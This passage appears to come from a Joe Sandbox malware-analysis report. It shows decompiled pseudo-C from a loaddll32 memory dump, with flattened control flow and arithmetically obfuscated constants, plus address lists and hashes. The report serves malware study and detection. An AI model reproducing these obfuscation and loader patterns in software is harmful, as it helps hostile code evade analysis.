							while(__eflags != 0) {
								_t222 =  *_t235;
								__eflags = _t222 - 0x30;
								if(_t222 < 0x30) {
									L9:
									__eflags = _t222 - 0x61;
									if(_t222 < 0x61) {
										L11:
										__eflags = _t222 - 0x41;
										if(_t222 < 0x41) {
											L13:
											 *_t235 = 0x58;
										} else {
											__eflags = _t222 - 0x5a;
											if(_t222 > 0x5a) {
												goto L13;
											}
										}
									} else {
										__eflags = _t222 - 0x7a;
										if(_t222 > 0x7a) {
											goto L11;
										}
									}
								} else {
									__eflags = _t222 - 0x39;
									if(_t222 > 0x39) {
										goto L9;
									}
								}
								_t235 = _t235 + 1;
								__eflags =  *_t235;
							}
							_t227 = 0x9fc41a2;
							continue;
						} else {
							if(_t227 == 0xb5c0777) {
								_t227 = 0xa1171ea;
								continue;
							}
						}
					}
					L18:
					__eflags = _t227 - 0x108096a;
					if(__eflags != 0) {
						continue;
					}
					return _t222;
				}
				_push(_v156);
				_push(_v196);
				_push(0x2b3119c);
				_t219 = E02B44244(_v184, _v172, __eflags);
				E02B50A1A(E02B45515(__eflags), __eflags, _t219, _v152,  &_v128, _v188, _t259, _v140, _v208, _v136);
				_t222 = E02B4FECB(_t219, _v160, _v168, _v192, _v200);
				_t272 =  &(_t272[0xe]);
				_t227 = 0x108096a;
				goto L18;
			}

0x02b49dff
0x02b49e06
0x02b49e08
0x02b49e0f
0x02b49e16
0x02b49e17
0x02b49e18
0x02b49e1d
0x02b49e25
0x02b49e28
0x02b49e34
0x02b49e3b
0x02b49e3e
0x02b49e42
0x02b49e4a
0x02b49e52
0x02b49e5a
0x02b49e5f
0x02b49e67
0x02b49e77
0x02b49e7b
0x02b49e87
0x02b49e8c
0x02b49e92
0x02b49e9a
0x02b49ea2
0x02b49eaa
0x02b49eb2
0x02b49eba
0x02b49ec2
0x02b49ec7
0x02b49ecc
0x02b49ed4
0x02b49ee0
0x02b49ee5
0x02b49eef
0x02b49ef4
0x02b49efa
0x02b49f02
0x02b49f0a
0x02b49f12
0x02b49f1a
0x02b49f22
0x02b49f2a
0x02b49f36
0x02b49f3b
0x02b49f41
0x02b49f49
0x02b49f55
0x02b49f5a
0x02b49f64
0x02b49f69
0x02b49f6f
0x02b49f7c
0x02b49f89
0x02b49f8e
0x02b49f96
0x02b49f9e
0x02b49fa6
0x02b49fae
0x02b49fb6
0x02b49fbb
0x02b49fc3
0x02b49fcb
0x02b49fd3
0x02b49fdb
0x02b49fe3
0x02b49feb
0x02b49ff3
0x02b49ff8
0x02b4a000
0x02b4a008
0x02b4a010
0x02b4a018
0x02b4a020
0x02b4a02d
0x02b4a030
0x02b4a034
0x02b4a03c
0x02b4a044
0x02b4a051
0x02b4a055
0x02b4a05d
0x02b4a065
0x02b4a06d
0x02b4a075
0x02b4a07a
0x02b4a082
0x02b4a08a
0x02b4a09a
0x02b4a0a2
0x02b4a0a5
0x02b4a0a9
0x02b4a0b1
0x02b4a0bb
0x02b4a10b
0x02b4a129
0x02b4a12e
0x02b4a131
0x00000000
0x02b4a0bd
0x02b4a0c3
0x02b4a0d5
0x02b4a0da
0x02b4a0de
0x02b4a0e0
0x02b4a0e2
0x02b4a0e4
0x02b4a0ea
0x02b4a0ea
0x02b4a0ec
0x02b4a0f2
0x02b4a0f2
0x02b4a0f4
0x02b4a0fa
0x02b4a0fa
0x02b4a0f6
0x02b4a0f6
0x02b4a0f8
0x00000000
0x00000000
0x02b4a0f8
0x02b4a0ee
0x02b4a0ee
0x02b4a0f0
0x00000000
0x00000000
0x02b4a0f0
0x02b4a0e6
0x02b4a0e6
0x02b4a0e8
0x00000000
0x00000000
0x02b4a0e8
0x02b4a0fd
0x02b4a0fe
0x02b4a0fe
0x02b4a103
0x00000000
0x02b4a0c5
0x02b4a0cb
0x02b4a0d1
0x00000000
0x02b4a0d1
0x02b4a0cb
0x02b4a0c3
0x02b4a1a9
0x02b4a1a9
0x02b4a1af
0x00000000
0x00000000
0x02b4a1bf
0x02b4a1bf
0x02b4a13b
0x02b4a13f
0x02b4a14b
0x02b4a150
0x02b4a185
0x02b4a19c
0x02b4a1a1
0x02b4a1a4
0x00000000

Strings

%;, xrefs: 02B49F0A
", xrefs: 02B49FAE
K3, xrefs: 02B49E4A

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "$%;$K3
API String ID: 0-3594330084
Opcode ID: 3896fd8a52e3dd09122b8aefeabcc2b76d047ab18b840efc3d2a7dccae31f7d6
Instruction ID: 7251d43f584e8280b601ea20c5a42c70d78bca1b86b99089e25f6525b4be9365
Opcode Fuzzy Hash: 3896fd8a52e3dd09122b8aefeabcc2b76d047ab18b840efc3d2a7dccae31f7d6
Instruction Fuzzy Hash: 1DA184721083809FD354CF66C589A5FBBE2FBC9758F00895DF0859A220D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B3A445, Relevance: 4.0, Strings: 3, Instructions: 213
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E02B3A445() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t198;
				signed int _t201;
				signed int _t203;
				void* _t206;
				void* _t220;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				intOrPtr _t229;
				intOrPtr* _t230;
				signed int _t231;
				signed int* _t232;

				_t232 =  &_v84;
				_v16 = 0x845726;
				_v16 = _v16 << 7;
				_t206 = 0xba97f4f;
				_v16 = _v16 ^ 0x422a9300;
				_v76 = 0xf633ca;
				_v76 = _v76 + 0xffff7f31;
				_v76 = _v76 << 6;
				_v76 = _v76 | 0x2929f239;
				_v76 = _v76 ^ 0x3d62fec6;
				_v20 = 0xcffe1c;
				_v20 = _v20 ^ 0x03d09261;
				_v20 = _v20 ^ 0x03162068;
				_v24 = 0xa4ea56;
				_v24 = _v24 + 0xffff4c41;
				_v24 = _v24 ^ 0x00afa4b9;
				_v40 = 0x50bd11;
				_v40 = _v40 + 0xffffa7ab;
				_v40 = _v40 * 0x3f;
				_t225 = 0;
				_v40 = _v40 ^ 0x13cebba3;
				_v60 = 0x50c08b;
				_v60 = _v60 ^ 0xc2cf2608;
				_v60 = _v60 << 4;
				_t226 = 0x56;
				_v60 = _v60 / _t226;
				_v60 = _v60 ^ 0x0073141c;
				_v64 = 0xa37df4;
				_v64 = _v64 + 0xffffdd88;
				_v64 = _v64 + 0xe629;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x0527d1d9;
				_v68 = 0x27b9fb;
				_t227 = 0x58;
				_v68 = _v68 / _t227;
				_v68 = _v68 * 0x63;
				_v68 = _v68 * 0x3d;
				_v68 = _v68 ^ 0x0aa4ff90;
				_v72 = 0x604a05;
				_v72 = _v72 | 0x3301bbe0;
				_v72 = _v72 + 0xf4ce;
				_v72 = _v72 + 0xffff6149;
				_v72 = _v72 ^ 0x336b10da;
				_v52 = 0x457d04;
				_v52 = _v52 * 0x45;
				_v52 = _v52 | 0xd82309ca;
				_v52 = _v52 + 0xff64;
				_v52 = _v52 ^ 0xdab2f2cc;
				_v8 = 0x71eccb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000a626b;
				_v12 = 0x94a0c6;
				_v12 = _v12 + 0xffffb2fd;
				_v12 = _v12 ^ 0x009145d9;
				_v56 = 0xdce517;
				_v56 = _v56 >> 1;
				_v56 = _v56 | 0xebc149ed;
				_v56 = _v56 + 0xffff7372;
				_v56 = _v56 ^ 0xebe5f8bb;
				_v44 = 0x6f3a42;
				_v44 = _v44 ^ 0x930a70ca;
				_v44 = _v44 ^ 0x072310e6;
				_v44 = _v44 ^ 0x944572d0;
				_v28 = 0xde598c;
				_v28 = _v28 + 0xffffb8ee;
				_v28 = _v28 ^ 0x00dc27c3;
				_v80 = 0x428d3e;
				_v80 = _v80 * 0x44;
				_v80 = _v80 + 0x7fb1;
				_v80 = _v80 ^ 0x009e7bae;
				_v80 = _v80 ^ 0x11330260;
				_v84 = 0x321edf;
				_v84 = _v84 | 0x009a6787;
				_v84 = _v84 ^ 0xc86f44a5;
				_v84 = _v84 ^ 0xbb12ab62;
				_v84 = _v84 ^ 0x73cf70d9;
				_v48 = 0x740eb7;
				_v48 = _v48 * 0x2b;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 + 0xb6e6;
				_v48 = _v48 ^ 0x040daff3;
				_v32 = 0x3035f0;
				_v32 = _v32 ^ 0xe5f6800a;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0xcb8c371c;
				_v36 = 0xd97c9c;
				_v36 = _v36 >> 3;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x03d4918e;
				_v4 = 0x2cfea0;
				_v4 = _v4 ^ 0xf57e16a0;
				_v4 = _v4 ^ 0xf550cd22;
				_t205 = _v4;
				_t231 = _v4;
				_t228 = _v4;
				while(1) {
					L1:
					_push(0x5c);
					while(1) {
						L2:
						_t198 = 0xd71e2f;
						do {
							L3:
							while(_t206 != _t198) {
								if(_t206 == 0x1e5f8bf) {
									_t201 = E02B3EE62(_v60, _t205, _v64, _v68, _v72, _v16, _t228);
									_t232 =  &(_t232[5]);
									_t231 = _t201;
									_t198 = 0xd71e2f;
									_t206 =  !=  ? 0xd71e2f : 0x6f129a6;
									_t220 = 0x5c;
									continue;
								} else {
									if(_t206 == 0x6f129a6) {
										E02B33046(_v48, _v32, _v36, _t205, _v4);
									} else {
										if(_t206 == 0x960e40f) {
											_t203 = E02B4E8B6(_t206, _v20, _v24, _t206, _v76, _v40);
											_t205 = _t203;
											_t232 =  &(_t232[4]);
											if(_t203 != 0) {
												_t206 = 0x1e5f8bf;
												goto L1;
											}
										} else {
											if(_t206 == 0xba97f4f) {
												_t206 = 0xbab8332;
												continue;
											} else {
												if(_t206 == 0xbab8332) {
													_t229 =  *0x2b56214; // 0x0
													_t230 = _t229 + 0x23c;
													while( *_t230 != _t220) {
														_t230 = _t230 + 2;
													}
													_t228 = _t230 + 2;
													_t206 = 0x960e40f;
													goto L2;
												} else {
													if(_t206 != 0xe557a67) {
														goto L20;
													} else {
														E02B33046(_v44, _v28, _v80, _t231, _v84);
														_t232 =  &(_t232[3]);
														_t206 = 0x6f129a6;
														while(1) {
															L1:
															_push(0x5c);
															L2:
															_t198 = 0xd71e2f;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L23:
								return _t225;
							}
							E02B31E9B(_v52, _t231, _v8, _v12, _v56);
							_t232 =  &(_t232[3]);
							_t198 = 0xd71e2f;
							_t225 =  !=  ? 1 : _t225;
							_t206 = 0xe557a67;
							_t220 = 0x5c;
							L20:
						} while (_t206 != 0x6b89e3f);
						goto L23;
					}
				}
			}

0x02b3a445
0x02b3a448
0x02b3a452
0x02b3a457
0x02b3a45c
0x02b3a464
0x02b3a46c
0x02b3a474
0x02b3a479
0x02b3a481
0x02b3a489
0x02b3a491
0x02b3a499
0x02b3a4a1
0x02b3a4a9
0x02b3a4b1
0x02b3a4b9
0x02b3a4c1
0x02b3a4d2
0x02b3a4d6
0x02b3a4d8
0x02b3a4e0
0x02b3a4e8
0x02b3a4f0
0x02b3a4fb
0x02b3a500
0x02b3a506
0x02b3a50e
0x02b3a516
0x02b3a51e
0x02b3a526
0x02b3a52b
0x02b3a533
0x02b3a53f
0x02b3a542
0x02b3a54b
0x02b3a554
0x02b3a558
0x02b3a560
0x02b3a568
0x02b3a570
0x02b3a578
0x02b3a580
0x02b3a588
0x02b3a595
0x02b3a599
0x02b3a5a1
0x02b3a5a9
0x02b3a5b1
0x02b3a5b9
0x02b3a5be
0x02b3a5c6
0x02b3a5ce
0x02b3a5d6
0x02b3a5de
0x02b3a5e6
0x02b3a5ea
0x02b3a5f2
0x02b3a5fa
0x02b3a602
0x02b3a60a
0x02b3a612
0x02b3a61a
0x02b3a622
0x02b3a62a
0x02b3a632
0x02b3a63a
0x02b3a647
0x02b3a64b
0x02b3a653
0x02b3a65b
0x02b3a663
0x02b3a66b
0x02b3a673
0x02b3a67b
0x02b3a683
0x02b3a68b
0x02b3a698
0x02b3a6a1
0x02b3a6a5
0x02b3a6ad
0x02b3a6b5
0x02b3a6bd
0x02b3a6c5
0x02b3a6c9
0x02b3a6d1
0x02b3a6d9
0x02b3a6e3
0x02b3a6e7
0x02b3a6ef
0x02b3a6f7
0x02b3a6ff
0x02b3a707
0x02b3a70b
0x02b3a70f
0x02b3a713
0x02b3a713
0x02b3a713
0x02b3a716
0x02b3a716
0x02b3a716
0x02b3a71b
0x00000000
0x02b3a71b
0x02b3a729
0x02b3a7f0
0x02b3a7f5
0x02b3a7f8
0x02b3a801
0x02b3a806
0x02b3a80b
0x00000000
0x02b3a72f
0x02b3a735
0x02b3a85f
0x02b3a73b
0x02b3a741
0x02b3a7bd
0x02b3a7c2
0x02b3a7c4
0x02b3a7c9
0x02b3a7cf
0x00000000
0x02b3a7cf
0x02b3a743
0x02b3a749
0x02b3a7a2
0x00000000
0x02b3a74b
0x02b3a751
0x02b3a77f
0x02b3a785
0x02b3a790
0x02b3a78d
0x02b3a78d
0x02b3a795
0x02b3a798
0x00000000
0x02b3a753
0x02b3a759
0x00000000
0x02b3a75f
0x02b3a770
0x02b3a775
0x02b3a778
0x02b3a713
0x02b3a713
0x02b3a713
0x02b3a716
0x02b3a716
0x00000000
0x02b3a716
0x02b3a713
0x02b3a759
0x02b3a751
0x02b3a749
0x02b3a741
0x02b3a735
0x02b3a867
0x02b3a870
0x02b3a870
0x02b3a823
0x02b3a828
0x02b3a830
0x02b3a835
0x02b3a838
0x02b3a83f
0x02b3a840
0x02b3a840
0x00000000
0x02b3a84c
0x02b3a716

Strings

kb, xrefs: 02B3A5BE
B:o, xrefs: 02B3A602
), xrefs: 02B3A51E

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )$B:o$kb
API String ID: 0-1085388577
Opcode ID: d4120816b4a3014ce13bd8c7ababcdd3b9797347683f28c22cafddce1cddf8f4
Instruction ID: 2cc1253bd41bbb838472645287bc7d30e8fc7738b98da514316b1513686310c2
Opcode Fuzzy Hash: d4120816b4a3014ce13bd8c7ababcdd3b9797347683f28c22cafddce1cddf8f4
Instruction Fuzzy Hash: EFA131714083419FC3A9CF65C99981BBBF1FBC4758F109A2DF59A96260D7B18A09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 02B4BEFD, Relevance: 4.0, Strings: 3, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E02B4BEFD(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v616;
				void* _t242;
				void* _t243;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t285;

				_v52 = 0xa5be;
				_t251 = 0x16;
				_v52 = _v52 / _t251;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x0005c33b;
				_v48 = 0xc42d20;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 + 0xffffc4d0;
				_v48 = _v48 ^ 0xfffeda29;
				_v72 = 0x4321a7;
				_v72 = _v72 | 0xa4ce3c40;
				_v72 = _v72 ^ 0xa4cab40f;
				_v24 = 0x227e38;
				_t25 =  &_v24; // 0x227e38
				_t252 = 0x2c;
				_v24 =  *_t25 * 0x3c;
				_t27 =  &_v24; // 0x227e38
				_v24 =  *_t27 * 0x66;
				_t29 =  &_v24; // 0x227e38
				_v24 =  *_t29 / _t252;
				_v24 = _v24 ^ 0x014a285a;
				_v60 = 0xfcfbbc;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x000d93d1;
				_v96 = 0xf80007;
				_v96 = _v96 + 0xaa36;
				_v96 = _v96 ^ 0x00fda443;
				_v80 = 0x5511cc;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0x00043fa8;
				_v88 = 0xbb6e3f;
				_v88 = _v88 + 0xffffbcf0;
				_v88 = _v88 ^ 0x00b4c382;
				_v8 = 0x49da65;
				_v8 = _v8 >> 3;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x0002f4aa;
				_v16 = 0xc843f1;
				_t253 = 0x50;
				_v16 = _v16 / _t253;
				_v16 = _v16 ^ 0x9e242cdc;
				_v16 = _v16 + 0xffff9a81;
				_v16 = _v16 ^ 0x9e230a73;
				_v36 = 0x2e6bc5;
				_v36 = _v36 | 0x2558a4e0;
				_v36 = _v36 + 0xfffff4e9;
				_v36 = _v36 ^ 0x257724e9;
				_v12 = 0x80a3b9;
				_t254 = 0x6f;
				_v12 = _v12 * 0x79;
				_v12 = _v12 + 0xffff3c67;
				_v12 = _v12 | 0xeef82a75;
				_v12 = _v12 ^ 0xfef88c24;
				_v68 = 0x7db499;
				_v68 = _v68 + 0xffff3f49;
				_v68 = _v68 ^ 0x007e0dc2;
				_v44 = 0x9f49e4;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x1368a87d;
				_v44 = _v44 ^ 0xfa51dcf6;
				_v64 = 0x98f463;
				_v64 = _v64 / _t254;
				_v64 = _v64 ^ 0x0008fd0c;
				_v76 = 0x12aedd;
				_v76 = _v76 + 0xf7e7;
				_v76 = _v76 ^ 0x001c1bc6;
				_v28 = 0x4e33bd;
				_t255 = 3;
				_v28 = _v28 / _t255;
				_t256 = 0x48;
				_v28 = _v28 / _t256;
				_t257 = 0x1b;
				_v28 = _v28 * 0x5d;
				_v28 = _v28 ^ 0x002c0e7b;
				_v20 = 0x6739f6;
				_v20 = _v20 * 0x51;
				_v20 = _v20 + 0x822b;
				_v20 = _v20 + 0xffff6302;
				_v20 = _v20 ^ 0x20a7052c;
				_v40 = 0xf776a1;
				_v40 = _v40 | 0xfaf9a8ad;
				_v40 = _v40 + 0xffffa6b3;
				_v40 = _v40 ^ 0xfaf95b8b;
				_v56 = 0xfd0dae;
				_v56 = _v56 / _t257;
				_t258 = 0x23;
				_v56 = _v56 / _t258;
				_v56 = _v56 ^ 0x000358d4;
				_v32 = 0xe62709;
				_v32 = _v32 + 0xffff3f09;
				_v32 = _v32 >> 8;
				_v32 = _v32 ^ 0x0009f673;
				_v92 = 0xdc059c;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x0dc87abe;
				_v84 = 0xab2272;
				_t259 = 0xb;
				_v84 = _v84 / _t259;
				_v84 = _v84 ^ 0x0001c613;
				_t285 =  *0x2b56214; // 0x0
				_t242 = E02B409DD(_v52, _t285 + 0x23c, _v48, _v72);
				_t293 = _a4 + 0x2c;
				_t243 = E02B5061D(_v24, _a4 + 0x2c, _t242, _v60, _v96);
				_t302 = _t243;
				if(_t243 != 0) {
					_push(_v16);
					_push(_v8);
					_push(_v88);
					E02B52D0A(_v12, _t302, _t293, _v68, _v44, _v64, _a8,  &_v616,  *((intOrPtr*)(_a8 + 0x3c)), E02B4E1F8(0x2b31000, _v80, _t302));
					E02B4FECB(_t246, _v76, _v28, _v20, _v40);
					E02B3D061( &_v616, _v56, _v32, _v92, _v84);
				}
				return 1;
			}

0x02b4bf06
0x02b4bf15
0x02b4bf1a
0x02b4bf1f
0x02b4bf23
0x02b4bf2a
0x02b4bf31
0x02b4bf35
0x02b4bf3c
0x02b4bf43
0x02b4bf4a
0x02b4bf51
0x02b4bf58
0x02b4bf5f
0x02b4bf63
0x02b4bf66
0x02b4bf69
0x02b4bf6d
0x02b4bf70
0x02b4bf77
0x02b4bf7a
0x02b4bf81
0x02b4bf88
0x02b4bf8c
0x02b4bf93
0x02b4bf9a
0x02b4bfa1
0x02b4bfa8
0x02b4bfaf
0x02b4bfb3
0x02b4bfba
0x02b4bfc1
0x02b4bfc8
0x02b4bfcf
0x02b4bfd6
0x02b4bfda
0x02b4bfde
0x02b4bfe2
0x02b4bfe9
0x02b4bff3
0x02b4bff8
0x02b4bffd
0x02b4c004
0x02b4c00b
0x02b4c012
0x02b4c019
0x02b4c020
0x02b4c027
0x02b4c02e
0x02b4c039
0x02b4c03a
0x02b4c03d
0x02b4c044
0x02b4c04b
0x02b4c052
0x02b4c059
0x02b4c060
0x02b4c067
0x02b4c06e
0x02b4c072
0x02b4c079
0x02b4c080
0x02b4c08c
0x02b4c08f
0x02b4c096
0x02b4c09f
0x02b4c0a6
0x02b4c0ad
0x02b4c0b9
0x02b4c0be
0x02b4c0c6
0x02b4c0cb
0x02b4c0d4
0x02b4c0d7
0x02b4c0da
0x02b4c0e1
0x02b4c0ec
0x02b4c0ef
0x02b4c0f6
0x02b4c0fd
0x02b4c104
0x02b4c10b
0x02b4c112
0x02b4c119
0x02b4c120
0x02b4c12e
0x02b4c134
0x02b4c139
0x02b4c13e
0x02b4c145
0x02b4c14c
0x02b4c153
0x02b4c157
0x02b4c15e
0x02b4c165
0x02b4c169
0x02b4c170
0x02b4c17a
0x02b4c17d
0x02b4c180
0x02b4c18d
0x02b4c19c
0x02b4c1ad
0x02b4c1b3
0x02b4c1bb
0x02b4c1bd
0x02b4c1c0
0x02b4c1c8
0x02b4c1cb
0x02b4c1fa
0x02b4c20d
0x02b4c224
0x02b4c22c
0x02b4c234

Strings

', xrefs: 02B4C145
$w%, xrefs: 02B4C027
8~", xrefs: 02B4BF5F

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: '$8~"$$w%
API String ID: 1586166983-1780403920
Opcode ID: a4f82622539d28117f4266db0d8aa34812702f2bfbcb99986e47b8c9f51dfc5b
Instruction ID: d3b3866ddf7e6efa6d19bccbf2e98b704c5063a5e0fcf61b1e18c9a059d1fdbc
Opcode Fuzzy Hash: a4f82622539d28117f4266db0d8aa34812702f2bfbcb99986e47b8c9f51dfc5b
Instruction Fuzzy Hash: 26A13171D0120DEBCF18CFE5D98A9DEBBB2FB44314F208059E511BA264D7B41A56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B4D8DB, Relevance: 3.9, Strings: 3, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B4D8DB(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t128;
				signed int _t142;
				signed int _t153;
				signed int _t155;
				signed int* _t163;
				void* _t164;
				signed int* _t167;

				_push(_a8);
				_t163 = __edx;
				_t153 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t128);
				_v104 = 0xcf676c;
				_t167 =  &(( &_v116)[4]);
				_v104 = _v104 + 0xb3f2;
				_v104 = _v104 | 0x988d6f24;
				_t164 = 0x3ef4407;
				_v104 = _v104 << 0xf;
				_v104 = _v104 ^ 0xbfbf0000;
				_v68 = 0xc42241;
				_v68 = _v68 + 0x399a;
				_v68 = _v68 ^ 0x00ce5291;
				_v88 = 0x75dd03;
				_v88 = _v88 + 0x7dba;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x0008d458;
				_v72 = 0x2f46be;
				_v72 = _v72 + 0xffffdb55;
				_v72 = _v72 ^ 0x002db90e;
				_v76 = 0x23e806;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x000f8af6;
				_v116 = 0x607e6d;
				_v116 = _v116 << 0x10;
				_v116 = _v116 + 0xffff6686;
				_v116 = _v116 | 0x3d181bb2;
				_v116 = _v116 ^ 0x7f71bdaf;
				_v96 = 0x2cc21a;
				_v96 = _v96 | 0xe9438a5f;
				_t155 = 0x3a;
				_v96 = _v96 * 0x13;
				_v96 = _v96 ^ 0x5347ec85;
				_v108 = 0xb3af1a;
				_v108 = _v108 / _t155;
				_v108 = _v108 + 0x8361;
				_v108 = _v108 | 0x789ced77;
				_v108 = _v108 ^ 0x789572df;
				_v92 = 0x2d2920;
				_v92 = _v92 * 0x2c;
				_v92 = _v92 * 0x1e;
				_v92 = _v92 ^ 0xe8dd3266;
				_v80 = 0xc07fec;
				_v80 = _v80 << 9;
				_v80 = _v80 ^ 0x80fbd8c8;
				_v112 = 0xa84277;
				_v112 = _v112 + 0xffffed27;
				_v112 = _v112 * 0x1b;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0c742dd9;
				_v64 = 0x297b8a;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x0005dd25;
				_v84 = 0x5c8db2;
				_v84 = _v84 + 0x6b9b;
				_v84 = _v84 + 0x3228;
				_v84 = _v84 ^ 0x0059c37f;
				_v100 = 0xb4d8ec;
				_v100 = _v100 << 1;
				_v100 = _v100 + 0xe9ba;
				_v100 = _v100 | 0x2516dceb;
				_v100 = _v100 ^ 0x257d75fc;
				do {
					while(_t164 != 0x3ef4407) {
						if(_t164 == 0x3f5e611) {
							_push(_t155);
							_push(_t155);
							_t142 = E02B3C5D8(_t163[1]);
							_t167 =  &(_t167[3]);
							 *_t163 = _t142;
							__eflags = _t142;
							if(__eflags != 0) {
								_t164 = 0xddf020d;
								continue;
							}
						} else {
							if(_t164 == 0x4994ece) {
								E02B4CAD5(_v64, _v84, __eflags, _v100, _t153 + 4,  &_v60);
							} else {
								if(_t164 == 0x4a51775) {
									_t155 = _t153;
									_t163[1] = E02B46187(_t155);
									_t164 = 0x3f5e611;
									continue;
								} else {
									if(_t164 == 0x9d156cc) {
										_t155 = _v108;
										E02B40A90(_t155, _v92, _v80,  &_v60, _v112,  *_t153);
										_t167 =  &(_t167[4]);
										_t164 = 0x4994ece;
										continue;
									} else {
										if(_t164 != 0xddf020d) {
											goto L13;
										} else {
											_t155 = _t163;
											E02B322A6(_t155, _v116,  &_v60, _v96);
											_t167 =  &(_t167[2]);
											_t164 = 0x9d156cc;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t163;
						_t127 =  *_t163 != 0;
						__eflags = _t127;
						return 0 | _t127;
					}
					_t164 = 0x4a51775;
					 *_t163 =  *_t163 & 0x00000000;
					__eflags =  *_t163;
					_t163[1] = _v104;
					L13:
					__eflags = _t164 - 0xae42d9c;
				} while (__eflags != 0);
				goto L16;
			}

0x02b4d8e2
0x02b4d8e9
0x02b4d8eb
0x02b4d8ed
0x02b4d8f4
0x02b4d8f5
0x02b4d8f6
0x02b4d8fb
0x02b4d903
0x02b4d906
0x02b4d910
0x02b4d918
0x02b4d91d
0x02b4d927
0x02b4d92f
0x02b4d937
0x02b4d93f
0x02b4d947
0x02b4d94f
0x02b4d957
0x02b4d95c
0x02b4d964
0x02b4d96c
0x02b4d974
0x02b4d97c
0x02b4d984
0x02b4d989
0x02b4d991
0x02b4d999
0x02b4d99e
0x02b4d9a6
0x02b4d9ae
0x02b4d9b6
0x02b4d9be
0x02b4d9cd
0x02b4d9ce
0x02b4d9d2
0x02b4d9da
0x02b4d9e8
0x02b4d9ec
0x02b4d9f4
0x02b4d9fc
0x02b4da04
0x02b4da11
0x02b4da1a
0x02b4da1e
0x02b4da26
0x02b4da2e
0x02b4da33
0x02b4da3b
0x02b4da43
0x02b4da50
0x02b4da59
0x02b4da5d
0x02b4da65
0x02b4da6d
0x02b4da72
0x02b4da7a
0x02b4da82
0x02b4da8a
0x02b4da92
0x02b4da9a
0x02b4daa2
0x02b4daa6
0x02b4daae
0x02b4dab6
0x02b4dabe
0x02b4dabe
0x02b4dad0
0x02b4db5e
0x02b4db5f
0x02b4db63
0x02b4db68
0x02b4db6b
0x02b4db6d
0x02b4db6f
0x02b4db71
0x00000000
0x02b4db71
0x02b4dad2
0x02b4dad8
0x02b4dbaa
0x02b4dade
0x02b4dae4
0x02b4db3a
0x02b4db41
0x02b4db44
0x00000000
0x02b4dae6
0x02b4daec
0x02b4db27
0x02b4db2b
0x02b4db30
0x02b4db33
0x00000000
0x02b4daee
0x02b4daf0
0x00000000
0x02b4daf6
0x02b4db03
0x02b4db05
0x02b4db0a
0x02b4db0d
0x00000000
